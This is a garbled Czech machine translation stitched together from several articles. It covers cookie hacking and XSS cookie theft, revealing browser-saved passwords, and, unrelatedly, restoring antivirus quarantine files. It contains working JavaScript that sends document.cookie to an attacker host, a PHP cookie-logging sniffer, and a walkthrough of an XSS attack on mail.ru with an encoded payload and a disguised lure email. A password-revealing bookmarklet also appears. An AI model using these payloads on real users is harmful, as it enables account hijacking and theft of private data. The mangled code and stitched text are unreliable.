Soubory cookie - informace ve formě textového souboru uloženého webovou stránkou na počítači uživatele. Obsahuje autentizační údaje (login/heslo, ID, telefonní číslo, adresa schránky), vlastní nastavení, stav přístupu. Uloženo v profilu prohlížeče.

Hackování cookies je krádež (nebo „únos“) relace návštěvníka webového zdroje. Soukromé informace se stávají dostupnými nejen odesílateli a příjemci, ale také třetí straně – osobě, která odposlech provedla.

Nástroje a techniky pro hackování souborů cookie

Počítačoví zloději, stejně jako jejich kolegové v reálném životě, mají kromě dovedností, šikovnosti a znalostí samozřejmě i vlastní nástroje – jakýsi arzenál generálních klíčů a sond. Pojďme se podívat na nejoblíbenější triky, které hackeři používají k získávání cookies z uživatelů internetu.

Čichači

Speciální programy pro sledování a analýzu síťového provozu. Jejich název pochází z anglického slovesa „sniff“ (sniff), protože. doslova „vyčuhovat“ přenášené pakety mezi uzly.

Útočníci však používají sniffer k zachycení dat relací, zpráv a dalších důvěrných informací. Cílem jejich útoků jsou především nechráněné sítě, kam se cookies odesílají v otevřené HTTP relaci, tedy prakticky nejsou šifrované. (Veřejné Wi-Fi je v tomto ohledu nejzranitelnější.)

Pro vložení snifferu do internetového kanálu mezi uživatelským uzlem a webovým serverem se používají následující metody:

• „naslouchání“ síťovým rozhraním (huby, přepínače);
• větvení a kopírování provozu;
• připojení k síťovému kanálu;
• analýzu pomocí speciálních útoků, které přesměrovávají provoz oběti na sniffer (MAC-spoofing, IP-spoofing).

Zkratka XSS znamená Cross Site Scripting. Používá se k útokům na webové stránky s cílem ukrást uživatelská data.

Princip XSS je následující:

• útočník vloží škodlivý kód (speciální skrytý skript) na webovou stránku webu, fóra nebo do zprávy (například při korespondenci na sociální síti);
• oběť navštíví infikovanou stránku a aktivuje se nainstalovaný kód na vašem PC (klikne, následuje odkaz atd.);
• Spuštěný škodlivý kód naopak „extrahuje“ důvěrná data uživatele z prohlížeče (zejména soubory cookie) a odešle je na webový server útočníka.

Aby hackeři „implantovali“ softwarový XSS mechanismus, využívají nejrůznější zranitelnosti webových serverů, online služeb a prohlížečů.

Všechny zranitelnosti XSS jsou rozděleny do dvou typů:

• Pasivní. Útok je získán vyžádáním konkrétního skriptu na webové stránce. Škodlivý kód lze vložit do různých formulářů na webové stránce (například do vyhledávací lišty). Nejnáchylnější na pasivní XSS jsou zdroje, které nefiltrují HTML tagy, když dorazí data;
• Aktivní. Nachází se přímo na serveru. A aktivují se v prohlížeči oběti. Aktivně je využívají podvodníci ve všech druzích blogů, chatů a zpravodajských kanálů.

Hackeři pečlivě „kamuflují“ své XSS skripty tak, aby oběť nic netušila. Změní příponu souboru, vydávají kód za obrázek, motivují je ke sledování odkazu a přitahují zajímavým obsahem. Výsledkem je: uživatel PC, neschopný ovládat svou vlastní zvědavost, vlastní rukou (kliknutím myši) odešle soubory cookie relace (s přihlašovacím jménem a heslem!) autorovi skriptu XSS - počítačovému padouchovi.

Nahrazení souborů cookie

Všechny cookies jsou uloženy a odeslány na webový server (ze kterého „přišly“) bez jakýchkoli změn – ve své původní podobě – se stejnými hodnotami, řetězci a dalšími údaji. Záměrná úprava jejich parametrů se nazývá substituce cookies. Jinými slovy, při nahrazování cookies útočník předstírá zbožné přání. Například při platbě v internetovém obchodě změní soubor cookie částku platby směrem dolů – dochází tak k „úspoře“ na nákupech.

Ukradené soubory cookie relace na sociální síti z účtu někoho jiného se „vloží“ do jiné relace a na jiný počítač. Majitel ukradených cookies obdrží plný přístup na účet oběti (korespondence, obsah, nastavení stránky), dokud nebude na její stránce.

„Úprava“ cookies se provádí pomocí:

• Funkce „Spravovat soubory cookie...“ v prohlížeči Opera;
• Doplňky Cookies Manager a Advanced Cookie Manager pro FireFox;
• Nástroje IECookiesView (pouze pro internet Explorer);
• textový editor jako AkelPad, NotePad nebo Windows Notepad.

Fyzický přístup k datům

Velmi jednoduchý obvod implementace se skládá z několika kroků. Je to však účinné pouze v případě, že počítač oběti s otevřenou relací, například VKontakte, zůstane bez dozoru (a po dlouhou dobu!):

1. Zadejte do adresního řádku prohlížeče funkce javascript, zobrazující všechny uložené soubory cookie.
2. Po stisknutí „ENTER“ se všechny objeví na stránce.
3. Soubory cookie se zkopírují, uloží do souboru a poté se přenesou na flash disk.
4. Na jiném PC jsou soubory cookie nahrazeny v nové relaci.
5. Přístup k účtu oběti je povolen.

Hackeři zpravidla používají výše uvedené nástroje (+ další) jak v kombinaci (protože úroveň ochrany na mnoha webových zdrojích je poměrně vysoká), tak samostatně (když jsou uživatelé přehnaně naivní).

XSS + čichač

1. Vytvoří se XSS skript, který specifikuje adresu online snifferu (buď podomácku vyrobeného nebo konkrétní služby).
2. Škodlivý kód je uložen s příponou .img (formát obrázku).
3. Tento soubor je poté nahrán na webovou stránku, chat nebo osobní zprávu, kde bude útok proveden.
4. Uživatelovu pozornost upoutá vytvořená „past“ (zde vstupuje v platnost sociální inženýrství).
5. Pokud se past spustí, sniffer zachytí soubory cookie z prohlížeče oběti.
6. Útočník otevře protokoly snifferu a načte ukradené cookies.
7. Dále provede substituci k získání práv vlastníka účtu pomocí výše uvedených nástrojů.

Ochrana souborů cookie před hackováním

1. Použijte šifrované připojení (pomocí vhodných protokolů a metod zabezpečení).
2. Nereagujte na pochybné odkazy, obrázky nebo lákavé nabídky, abyste se seznámili s „novým svobodným softwarem“. Zejména od cizích lidí.
3. Používejte pouze důvěryhodné webové zdroje.
4. Ukončete autorizovanou relaci kliknutím na tlačítko „Odhlásit“ (ne pouze zavřením karty!). Zvláště pokud účet nebyl přihlášen pomocí osobní počítač, a například z PC v internetové kavárně.
5. Nepoužívejte v prohlížeči funkci „Uložit heslo“. Uložená registrační data výrazně zvyšují riziko krádeže. Nebuďte líní, neztrácejte pár minut času zadáváním hesla a přihlašováním na začátku každé relace.
6. Po procházení webu – návštěvě sociálních sítí, fór, chatů, webových stránek – smažte uložené soubory cookie a vymažte mezipaměť prohlížeče.
7. Pravidelně aktualizujte prohlížeče a antivirový software.
8. Používejte rozšíření prohlížeče, která chrání před útoky XSS (například NoScript pro FF a Google Chrome).
9. Pravidelně na účtech.

A hlavně neztrácejte ostražitost a pozornost při odpočinku nebo práci na internetu!

Obrázek ukazuje, že cookie obsahuje řádek wordpress_logged_in_263d663a02379b7624b1028a58464038=admin. Tato hodnota je v souboru cookie v nezašifrované podobě a lze ji snadno zachytit pomocí nástroje Achilles, ale ve většině případů v Achilles můžete vidět pouze hash konkrétní položky. Před odesláním požadavku na server můžete zkusit nahradit tento řádek jakýmkoli podobným (i když v tomto případě to nemá smysl) - počet pokusů není omezen. Poté odesláním tohoto požadavku na server pomocí tlačítka Odeslat můžete obdržet odpověď ze serveru určeného pro administrátora.

V předchozím příkladu můžete použít přímé falšování ID uživatele. Kromě toho název parametru, který nahrazuje hodnotu, kterou poskytuje další funkce hacker, může být následující: uživatel (například USER=JDOE), jakýkoli výraz s řetězcem ID (například USER=JDOE nebo SESSIONID=BLAHBLAH), správce (například ADMIN=TRUE), relace (například , SESSION=ACTIVE), košík (například CART=FULL), stejně jako výrazy jako TRUE, FALSE, ACTIVE, NEACTIVE. Typicky formát cookies velmi záleží na aplikaci, pro kterou se používají. Tyto tipy pro hledání nedostatků aplikací pomocí souborů cookie však platí téměř pro všechny formáty.

Protiopatření na straně klienta proti extrakci souborů cookie

Obecně by si uživatelé měli dávat pozor na webové stránky, které používají soubory cookie k ověřování a ukládání citlivých dat. Je také důležité pamatovat na to, že web, který používá k ověřování soubory cookie, musí podporovat minimálně protokol SSL zašifrovat uživatelské jméno a heslo, protože při absenci tohoto protokolu jsou data přenášena v nešifrované podobě, což umožňuje jejich zachycení pomocí nejjednoduššího software pro zobrazení dat odesílaných přes síť.

Společnost Kookaburra Software vyvinula nástroj pro usnadnění používání souborů cookie. Nástroj se nazývá CookiePal ( http://www.kburra.com/cpal.html (viz www.kburra.com)). Tento program má upozornit uživatele, když se webová stránka pokusí nainstalovat cookie do počítače, a uživatel může tuto akci povolit nebo zakázat. Podobné funkce blokování souborů cookie jsou dnes dostupné ve všech prohlížečích.

Dalším důvodem pro pravidelnou instalaci aktualizací webového prohlížeče je neustálé zjišťování bezpečnostních chyb v těchto programech. Bennet Haselton a Jamie McCarthy tedy vytvořili skript, který po kliknutí na odkaz načte cookies z klientského počítače. V důsledku toho bude k dispozici veškerý obsah souborů cookie, které jsou na počítači uživatele.

Tento druh hackování lze provést také pomocí rukojeti

Abychom zajistili, že takové věci neohrožují naše osobní údaje, dělám to sám a všem radím, aby vždy aktualizovali software, který pracuje s kódem HTML ( e-mailové klienty, přehrávače médií, prohlížeče atd.).

Mnoho lidí dává přednost prostému blokování souborů cookie, ale většina webových stránek vyžaduje procházení souborů cookie. Závěr – pokud se v blízké budoucnosti objeví inovativní technologie, která vám umožní obejít se bez cookies, programátoři a správci si vydechnou, ale zatím zůstávají cookies pro hackera chutným sousto! To je pravda, protože zatím neexistuje lepší alternativa.

Protiopatření na straně serveru

V případě doporučení pro zajištění bezpečnosti serveru dávají odborníci jednu jednoduchou radu: nepoužívejte mechanismus cookies, pokud to není nezbytně nutné! Zvláštní pozornost je třeba věnovat používání cookies, které zůstávají v systému uživatele po ukončení komunikační relace.

Samozřejmě je důležité pochopit, že soubory cookie lze použít k zajištění zabezpečení webových serverů pro ověřování uživatelů. Pokud vaše aplikace potřebuje používat soubory cookie, měli byste nakonfigurovat mechanismus souborů cookie tak, aby používal různé krátkodobé klíče pro každou relaci, a pokusit se do těchto souborů nevkládat informace, které by hackeři mohli využít k hackování (např. ADMIN=TRUE). .

Navíc pro zajištění větší bezpečnosti při práci s cookies můžete použít šifrování cookies, abyste zabránili extrakci důležitá informace. Šifrování samozřejmě nevyřeší všechny bezpečnostní problémy při práci s technologií cookie, ale tato metoda zabrání nejzákladnějším výše popsaným hackům.

Co je to cookie?

Existuje mechanismus, který umožňuje http serveru některé ukládat textové informace a poté ji kontaktujte. Tato informace se nazývá cookie. Každý soubor cookie je v podstatě pár: název parametru a jeho hodnota. Každému cookie je také přiřazena doména, ke které patří. Z bezpečnostních důvodů má http server ve všech prohlížečích povolen pouze přístup k cookie své domény. Soubory cookie mohou mít navíc datum vypršení platnosti, v takovém případě budou uloženy v počítači do tohoto data, i když zavřete všechna okna prohlížeče.

Proč jsou soubory cookie důležité?

Všechny systémy pro více uživatelů používají soubory cookie k identifikaci uživatele. Přesněji řečeno, aktuální připojení uživatele ke službě, uživatelská relace. Pokud někdo pozná vaše cookies, bude se moci přihlásit do systému vaším jménem. Protože v v současné době velmi málo internetových zdrojů kontroluje změny IP adresy během jedné uživatelské relace.

Jak změnit nebo nahradit soubory cookie?

Vývojáři prohlížečů neposkytují vestavěné nástroje pro úpravu souborů cookie. Ale vystačíte si s běžným poznámkovým blokem.

Krok 1: vytvořte textový soubor s textem

Editor registru systému Windows verze 5.00



@="C:\\IE_ext.htm"

Uložte jej pod názvem IE_ext.reg

Krok 2: Pomocí vytvořeného souboru přidejte změny do registru Windows.

Krok 3: vytvořte textový soubor s textem

< script language="javascript">
external.menuArguments.clipboardData.setData("Text" , external.menuArguments.document.cookie);

external.menuArguments.document.cookie= "testname=testvalue; path=/; domain=testdomain.ru";
alert(externí.menuArgumenty.dokument.cookie);

Uložte jej pod názvem C:\IE_ext.htm

Krok 4: Přejdeme na webovou stránku, která nás zajímá.

Krok 5: Klikněte pravým tlačítkem na volný prostor stránku a vyberte položku nabídky "Práce s cookies". Povolit přístup do schránky. Vaše soubory cookie z tohoto webu se přesunou do schránky. Můžete vložit jejich poznámkový blok a podívat se.

Krok 6: Chcete-li změnit některé soubory cookie, upravte soubor C:\IE_ext.htm a nahraďte jej testovací jméno ve jménu cookie, zkušební hodnota- o jeho významu, testdomain.ru– do domény webu. V případě potřeby přidejte více podobných čar. Pro usnadnění ovládání jsem do skriptu přidal výstup aktuálních souborů cookie před a po změně: alert(externí.menuArgumenty.dokument.cookie);

Krok 7: Proveďte znovu krok 5 a poté obnovte stránku.

Sečteno a podtrženo: k tomuto internetovému zdroji budeme přistupovat s aktualizovanými soubory cookie.

Jak ukrást cookies pomocí JavaScriptu?

Pokud se útočníkovi podaří najít příležitost ke spuštění libovolného skriptu JavaScript na počítači oběti, může velmi snadno číst aktuální soubory cookie. Příklad:

var str= document.cookie;

Bude je však moci přenést na svůj web, protože, jak jsem již naznačil, skript JavaScriptu nebude mít přístup k webu umístěnému na jiné doméně bez dodatečného potvrzení? Ukázalo se, že skript JavaScript může načíst jakýkoli obrázek umístěný na libovolném http serveru. Zároveň do tohoto obrázku přeneste veškeré textové informace v požadavku na stažení. Příklad: http://hackersite.ru/xss.jpg?text_info Pokud tedy spustíte tento kód:

var img= nový vzhled();

img.src= "http://hackersite.ru/xss.jpg?"+ encodeURI(dokument.cookie);

pak cookie skončí v požadavku na stažení „obrázku“ a „přejde“ k útočníkovi.

Jak vyřídit takové žádosti o stažení „obrázku“?

Útočníkovi stačí najít hosting s podporou PHP a umístit tam kód takto:

$uid=urldecode($_SERVER["QUERY_STRING"]);
$fp=fopen("log.txt","a");
fputs($fp,"$uid\n");
fclose($fp);
?>

Poté budou všechny parametry požadavku pro tento skript uloženy do souboru log.txt. Zbývá pouze nahradit v dříve popsaném skriptu JavaScript http://hackersite.ru/xss.jpg na cestu k tomuto php skriptu.

Sečteno a podtrženo

Ukázal jsem pouze nejjednodušší způsob, jak využít zranitelnosti XSS. To však dokazuje, že přítomnost alespoň jedné takové chyby zabezpečení na víceuživatelském webu může útočníkovi umožnit používat jeho zdroje vaším jménem.

Ve kterém bylo navrženo zúčastnit se bezplatné akce věnované problematice informační bezpečnost. Jelikož se akce konala v mém městě, rozhodl jsem se, že tam rozhodně musím jít. První lekce byla věnována zranitelnostem na webech jako je XSS. Po lekci jsem se rozhodl, že potřebuji upevnit nabyté znalosti v reálných podmínkách. Vybral jsem si několik stránek, které se týkají mého města, a začal jsem se snažit vložit svůj skript do všech formulářů. Ve většině případů byl skript odfiltrován. Ale stalo se, že se spustilo „upozornění“ a objevila se moje zpráva. Nalezenou zranitelnost jsem nahlásil administrátorům a ti vše rychle opravili.

Jednoho z těchto dnů mě při kontrole nejnovější pošty na mail.ru zaujal formulář pro vyhledávání dopisů ve schránce. Občas jsem použil toto hledání, abych našel něco, co jsem potřeboval v hromadě mých starých dopisů. No, protože jsem za posledních pár dní vložil své „upozornění“ téměř všude, kde jsem mohl, moje ruka reflexivně sáhla po tomto vyhledávacím formuláři. Zadal jsem kód pro svůj skript a stiskl Enter. Představte si mé překvapení, když jsem na obrazovce uviděl bolestně známou zprávu...

Na přednášce Open InfoSec Days řečník řekl, že programátoři jsou k zranitelnostem tohoto druhu dosti skeptičtí a řekli „alert? No, tak co? To není nebezpečné." Pokud jsem se na jiných stránkách spokojil pouze s tímto oknem se svou zprávou, pak jsem se v tomto případě rozhodl jít dále a ukázat, co z takového „upozornění“ může vzejít.

Skript tedy funguje, což znamená, že existuje zranitelnost. Proto můžete zkusit spustit nějaký jiný skript. Například skript, který nám posílá cookies jiného uživatele. Aby skript fungoval, musíme donutit uživatele, aby náš skript provedl. To lze provést zasláním dopisu s odpovídajícím odkazem, po kliknutí na který proběhne vyhledávání poštovní schránka a kód, který potřebujeme, bude spuštěn.

Pochopení mechanismu zranitelnosti trvalo nějaký čas a hodně experimentování. Někdy se scénář povedl, někdy byl odfiltrován. Po určitém úsilí bylo empiricky zjištěno, že skript funguje 100% pouze v případě, že hledání písmen dává pozitivní výsledek. To znamená, že když uživatel provádí vyhledávání pomocí našeho skriptu, je nutné, aby alespoň jeden dopis v jeho poštovní schránce dané parametry nalezeno. Není těžké to zařídit.

if (isset($_GET["cookie"]))
{
$text = "Přijetí nového souboru cookie od". $_SERVER["REMOTE_ADDR"] ." na ". datum("l jS \of F Y h:i:s A");
$text .= "\n".str_repeat("=", 22) . "\n" . $_GET["cookie"]."\n".str_repeat("=", 22)."\n";
$soubor = fopen("sniff.txt", "a");
fwrite($soubor, $text);
fclose($soubor);
}
?>

Místo „upozornění“ také potřebujeme skript, který přenese soubory cookie do našeho snifferu. Tento skript napíšeme samostatný soubor a načteme jej do našeho vyhledávání. Vytvořil jsem soubor test.js s potřebným kódem a nahrál ho na hosting. Kód skriptu je takto:

Img=nový obrázek();
img.src="http://sitename.ru/sniff.php?cookie="+document.cookie;
funkce F() (
location="http://www.solife.ru";
}
setTimeout(F, 5000);

Co bych zde chtěl objasnit. Postavme se na místo útočníka. Potřebujeme, aby uživatel kliknul na odkaz. Jak ho k tomu mohu donutit? Můžete slíbit hory zlata a abyste je dostali, musíte sledovat náš odkaz na stránku. Ale myslím, že to nepůjde. Lidé už na to neklesají (já sám takové dopisy neustále mažu, aniž bych je četl). Budeme si tedy hrát na lidskou lítost, protože v přírodě stále existuje. Žádáme vás, abyste na stránce hlasovali pro záchranu ohrožených zvířat. Nejprve vezmeme soubory cookie a poté uživatele přesměrujeme na hlasovací stránku. Časový limit pro přesměrování byl nastaven na 5 sekund, jinak se soubory cookie jednoduše nestihly přenést do snifferu a uživatel byl okamžitě přesměrován na stránku o zvířatech. Místo „upozornění“ jsem použil následující skript:

Když jsem skončil se scénáři, začal jsem psát dopis. Napadlo mě něco takového:


Ukázalo se to docela cynicky, ale snažil jsem se podmínky co nejvíce přiblížit realitě. Na konci dopisu je řádek se skriptem, to proto, aby byl náš dopis nalezen, když budeme hledat. Aby linka nevyvolávala zbytečné otázky, natřela jsem ji bílou barvou. Do slova „http“ jsem také vložil mezeru, aby řetězec nebyl rozpoznán a převeden na odkaz. V opačném případě, přestože je řádek skriptu napsán bílým písmem, příjemce by odkaz zvýraznil modře, a to nepotřebujeme. Chytré vyhledávání tento řetězec i přes mezery stále najde a rozpozná.

E.mail.ru/cgi-bin/gosearch?q_folder=0&q_query=%27%3E%3Cscript%20src%3D%27http%3A%2F%2Fsitename.ru%2Ftest.js%27%3E%3C%2Fscript%3E

Pro skript jsem použil kódování URL, aby nebylo nic odfiltrováno. Také jsem přidal parametr „q_folder=0“ pro vyhledávání, takže vyhledávání probíhá ve složce „Inbox“.

Dopis je připraven, odesíláme. Použil jsem svou druhou poštovní schránku na stejné službě jako příjemce. Podívejme se, co přišlo do druhé krabice.

Text našeho skriptu není vidět, protože splývá s pozadím. Klikneme na odkaz a uvidíme, co se stane. Uživatel se přesune do výsledků vyhledávání e-mailů na základě námi zadaného parametru. Náš dopis, který jsme odeslali, je viditelný ve výsledcích vyhledávání. V tuto chvíli již náš skript fungoval a odeslal soubory cookie uživatele do snifferu. Po 5 sekundách (čas závisí na nastavení skriptu) je uživatel přesměrován na hlasovací stránku.

Zkontroluji svůj soubor sniff.txt:

Protože mým cílem není krást schránky jiných lidí nebo k nim získat přístup, zde příběh ukončím. Teoreticky však můžete své soubory cookie nahradit soubory cookie někoho jiného a získat přístup k poštovní schránce někoho jiného. Obecně platí, že pokud má útočník zájem o cíl, najde pro obdržené informace využití.

Rád bych poděkoval Sergeji Belovovi (

Cookies jsou pro uživatele nezbytné nejen pro rychlejší načítání průběžně navštěvovaných stránek. Vzdálené servery automaticky ukládají tyto nebo jiné informace do počítače uživatele, takže v budoucnu bude pohodlné pracovat s výměnou dat.

Instrukce

1. Chcete-li zjistit přihlašovací jméno a heslo uživatele na zdrojích, můžete použít soubory. Pokud používáte prohlížeč Mozilla Firefox, a obsahuje možnost zaznamenávat cookies, uložená přihlašovací jména a hesla zjistíte přímo v programu. Chcete-li to provést, klikněte v horní části stránky v nabídce prohlížeče na položku s názvem „Nástroje“. Vyberte nastavení systému. Před vámi se objeví velké okno obsahující několik záložek. Přejděte na kartu „Zabezpečení“.

2. V okně, které se zobrazí, klikněte na tlačítko označené „Uložená hesla“. Objeví se před vámi nové okno se seznamem přihlašovacích údajů, které jste si uložili do různých zdrojů. Klikněte na tlačítko „Zobrazit hesla“. Tyto informace můžete také chránit nastavením hesla ve stejné nabídce.

3. Pokud používáte prohlížeč Opera, budete moci zjistit pouze uživatelská jména. Chcete-li to provést, otevřete správce hesel v nástrojích a podívejte se na dostupné přihlašovací údaje. Chcete-li zjistit uložené heslo, nainstalujte další software, například Opera Password Recovery. Zároveň mějte na paměti, že žádný software třetí strany nezaručuje úplnou bezpečnost vašich osobních údajů, proto si hesla pamatujte samostatně nebo použijte jiný prohlížeč.

4. Chcete zobrazit své heslo v prohlížeči Google Chrome? Poté otevřete nastavení v parametrech kliknutím na příslušnou položku na panelu nástrojů. Přejděte do sekce „pokročilé“ a klikněte na „Zobrazit soubory cookie“.

5. Pokud jste standardní uživatel internetový prohlížeč Explorer, použijte k extrakci hesla primitivní nástroj BehindTheAsteriskus. Jedná se o bezplatný program, který má intuitivní rozhraní a poskytuje uživateli možnost zobrazení hesla v symbolech namísto hvězdiček. Tento nástroj je dostupný i pro jiné prohlížeče.

Mnoho moderních prohlížečů má takovou funkci, jako je zapamatování si hesel pro různé stránky. Zadáním hesla jednou se zbavíte nutnosti vyplňovat řádek pokaždé, když vstoupíte na stránky. Co ale dělat, když jste zapomněli své heslo a je skryto za tečkami na webu? Chcete-li zjistit heslo, musíte postupovat podle dalších pokynů.

Instrukce

1. Nejprve musíte přejít na stránku, pro kterou potřebujete heslo. Klikněte na "Password Wand". Jakmile jsou všechna pole vyplněna hvězdičkami nebo tečkami, okamžitě stiskněte ESC. Poté do adresního řádku zadejte následující kód: javascript:(funkce () ( inp = document.getElementsByTagName(‘input‘); for (var j = 0; j< inp.length; j++) { if (inp[j].type == ‘password’) { prompt(inp[j].name, inp[j].value); } } }) ()Нажав на ENTER, вы получите нужный пароль.

2. Pokud první metoda nepomůže, můžete použít nástroj Opera password Recovery. Jedná se o program, který je určen k opravě hesel uložených v prohlížeči Opera. Tento program je velmi jednoduchý a snadno se používá, stačí jej spustit a poté kliknout na „Opravit hesla“. Vše objeveno hesla bude uložen v textové soubory nebo v HTML zprávách.

Všechny moderní prohlížeče mají možnost čištění dočasné soubory, počítaje v to cookies. Někdy ale není nutné úplně vymazat, ale selektivně prohlížet, upravovat a mazat cookies uložené prohlížečem. Níže je uveden přehled přístupu k této možnosti ve zvláště známých prohlížečích.

Instrukce

1. V prohlížeči Opera pro přístup ke každému souboru cookie, který ukládá, musíte přejít do části „Nastavení“ v „Hlavní nabídce“ a vybrat tam položku „Obecná nastavení...“ (nebo stisknout kombinaci kláves CTRL + F12) . V důsledku toho se otevře okno nastavení prohlížeče, ve kterém musíte přejít na kartu „Upřesnit“, v levém panelu vybrat sekci „Cookies“ a kliknout na tlačítko „Spravovat soubory cookie“.

2. V Opeře v okně správy souborů cookie můžete najít, co potřebujete, vybrat to a kliknutím na tlačítko „Upravit“ zobrazit obsah záznamu. Pokud chcete, můžete soubor cookie upravit.

3. V Mozilla FireFox, abyste se dostali k souborům cookie, musíte v nabídce vybrat sekci „Nástroje“ a kliknout na „Nastavení“. V okně nastavení přejděte na kartu „Soukromí“ a klikněte na tlačítko „Zobrazit soubory cookie...“. V důsledku toho se otevře okno se seznamem uložených cookies, ve kterém můžete vyhledávat a prohlížet si jejich obsah.

4. V aplikaci Internet Explorer je cesta k úložišti souborů cookie přes sekci nabídky nazvanou „Nástroje“ a položku „Možnosti Internetu“ v ní. Kliknutím na tuto položku se otevře okno, ve kterém musíte na kartě „Obecné“ kliknout na jedno z tlačítek „Možnosti“ umístěných v části „Historie procházení“. Poté se otevře následující okno s nadpisem „Možnosti dočasného souboru“, kde musíte kliknout na tlačítko označené „Zobrazit soubory“.

5. Pomocí této metody v Internet Exploreru budete přesměrováni do složky, kde jsou uloženy všechny dočasné soubory. Pokud kliknete na záhlaví sloupce „Název“, soubory budou seřazeny podle názvu a všechny soubory cookie budou seskupeny do jednoho bloku. Ten, který potřebujete, můžete najít a otevřít pro prohlížení a úpravy v běžném textovém editoru.

6. Prohlížeč Google Chrome má nejdelší sekvenci kroků k získání přístupu k souborům cookie. Nejprve byste měli kliknout na ikonu klíče v pravém horním rohu okna a v nabídce vybrat možnost „Možnosti“. Tím se otevře stránka Nastavení, v jejímž levém podokně musíte kliknout na odkaz Upřesnit. Na stránce pokročilých nastavení kliknutím na tlačítko „Nastavení obsahu“ otevřete nové okno.

7. V novém okně musíte kliknout na tlačítko „Všechny soubory cookie a data stránek“. Toto bude konečný cíl při přechodu na soubory cookie uložené prohlížečem.

8. V Google Chrome můžete prohlížet a mazat cookies .

9. V Prohlížeč Safari Chcete-li získat přístup k souborům cookie, musíte také kliknout na ikonu v pravém horním rohu – na ikonu s ozubeným kolem. V nabídce vyberte „Nastavení...“, čímž se otevře nové okno. V něm musíte přejít na kartu „Zabezpečení“ a kliknout na tlačítko „Zobrazit soubory cookie“. V Safari můžete pouze vyhledávat a mazat cookies .

Video k tématu

Moderní programy prohlížečů si za nás pamatují vše: naše oblíbené stránky, vše, co jsme po dlouhou dobu navštívili, hesla na všechny druhy webů - pošta, hry, veřejné sítě. Jak pohodlné je jít na stránku a už nemyslet na zadávání přihlašovacího jména a hesla! Občas ale musíte přeinstalovat systém a vrátit všechna hesla z programové paměti do svého.

Budete potřebovat

• – počítač s přístupem na internet
• – prohlížeč

Instrukce

1. Běh program Mozilla Firefox a obnovit Heslo uloženy v tomto prohlížeči, spusťte příkaz „Tools“. Vyberte položku nabídky „Nastavení“, přejděte na kartu „Zabezpečení“ a klikněte na tlačítko „Uložená hesla“. V tomto okně si prohlédněte všechna hesla uložená v prohlížeči, vyberte to, které potřebujete, a klikněte na „zobrazit“.

2. Stáhněte si program, který vám umožní zobrazit uložená hesla v programu Opera - UnWand - Program pro prohlížení hesel (Wand - Wand) v Opeře a také obnovení hesla Opera 3.5.1.225 Odhalit to nebude těžké. Nainstalujte program do počítače, spusťte program. Vyberte požadovanou možnost opravy hesla: mechanicky z hůlky, mechanicky z pošty, ručně z hůlky, ručně z pošty, smíšená možnost. Klikněte na tlačítko "Další". Zobrazí se okno skenování, v dalším okně je třeba zadat umístění programu Opera a kliknout na tlačítko Další. Program prohledá tuto složku a zobrazí uložená hesla.

3. Stáhněte si program, který umí zobrazit hesla v prohlížeči nejen v Opeře nebo Mozille, ale i v mnoha dalších prohlížeče- Multi Password Recovery. Chcete-li stáhnout, přejděte na oficiální webovou stránku programu - http://passrecovery.com/ru/index.php. Stáhněte a nainstalujte tento program do počítače. Během instalace vás program požádá o kontrolu aktualizace, klikněte na „OK“. Spusťte program z hlavní nabídky. Vlevo se zobrazí nabídka, ve které musíte preferovat potřebný program za účelem obnovení Heslo. Například prohlížeč Internet Explorer, vyberte jej ze seznamu a hesla uložená v tomto prohlížeči se zobrazí na pravé straně okna programu.

4. Aby bylo možné obnovit Heslo z prohlížeče pomocí jiného programu přejděte na stránku http://www.nirsoft.net/, vyberte a stáhněte si libovolný program odtud. Jejich funkce jsou podobné jako u předchozích popsaných programů.

Pro zachování soukromí při zadávání hesel téměř vždy příslušné programy zobrazují nečitelné znaky – „hvězdičky“ místo zadávaných znaků. Pokud však v poli pro zadání hesla vidíte stejné hvězdičky, neznamená to, že Heslo. Často takové hvězdy nic neskrývají, ale nosí je čistě informační funkce– uvědomte si, že když vstoupíte Heslo bude skryta před zvědavýma očima.

Instrukce

1. Vzdejte se záměru dešifrovat hvězdičky na webových stránkách přijatých ze serveru. V naprosté většině případů nejsou hesla přenášena serverem do prohlížeče uživatele. Můžete si to ověřit otevřením kódu úvodní stránky přijatého vaším webovým prohlížečem – nebude v žádném případě obsahovat heslo. otevřený formulář ani šifrované. Hesla jsou přenášena přes internet pouze jedním směrem - z prohlížeče na server.

2. Použijte nějaký specializovaný aplikační program, který umí číst hesla v otevřených oknech jiných programů. Jako součást servisních komponent operační systém takové fondy neexistují. Bylo by neobvyklé, aby byl dešifrovací program spojen s programy pro zabezpečení hesel. Požadovaný program lze snadno najít na internetu – může to být například Pass Checker. Program se skládá ze šesti souborů (včetně souboru nápovědy) o celkové hmotnosti 296 kilobajtů a nevyžaduje instalaci. Ihned po uložení souborů na pevný disk nebo vyměnitelné médium jej můžete spustit dvojitým kliknutím na soubor Password.exe.

3. Otevřete program, na jehož hvězdách vám záleží. Poté umístěte okno kontroly průchodu otevřený program a levým tlačítkem myši přetáhněte obrázek lebky na pole se skrytou hvězdičky Heslo. Toto pole bude zvýrazněno blikajícím rámečkem a v okně Pass Checker, naproti textu okna, umístí dekodér Heslo v jeho nezašifrované podobě. The Heslo Můžete kopírovat a používat, jak chcete.

4. Chcete-li použít složitější metody dešifrování hesla, klepněte na tlačítko Nápověda ve spodní řadě tlačítek. Kromě zvlášť jednoduchého, popsaného v předchozím kroku, program nabízí další dvě možnosti. I přes rozhraní v angličtině je nápověda Pass Checker napsána v ruštině, takže s překladem nebudou žádné problémy.

Video k tématu

Postup pro načtení náhodně přesunutých souborů z karanténa Naprostá většina antivirových programů je víceméně standardizovaná a liší se pouze v detailech. V tomto případě zvažujeme operaci opravy souborů aplikací Microsoft v karanténě Základy zabezpečení, Norton a Avast Antivirus.

Budete potřebovat

• – Zabezpečení společnosti Microsoft Essentials;
• – avast! Antivirus zdarma 5.0;
• – Norton internetová bezpečnost

Instrukce

1. Spusťte aplikaci Microsoft Security Essentials a přejděte na kartu „Protokol“ v hlavním okně programu, abyste provedli operaci extrahování souborů z karanténa .

2. Vyberte položku „Položky v karanténě“ a v dialogovém okně, které se otevře, klikněte na tlačítko „Zobrazit data“.

3. V zobrazeném okně požadavku zadejte heslo správce počítače a zadejte soubor, ze kterého chcete opravit karanténa, v seznamu.

4. Klepnutím na tlačítko "Obnovit" dokončete postup extrahování souboru nebo k tomu použijte tlačítko "Odstranit vše". kompletní úklid karanténa Antivirová aplikace Microsoft Security Essentials.

5. V hlavním okně vyberte položku nabídky „Údržba“. antivirový program avast! Free Antivirus 5.0 a přejděte na kartu „Karanténa“ v dialogovém okně, které se otevře.

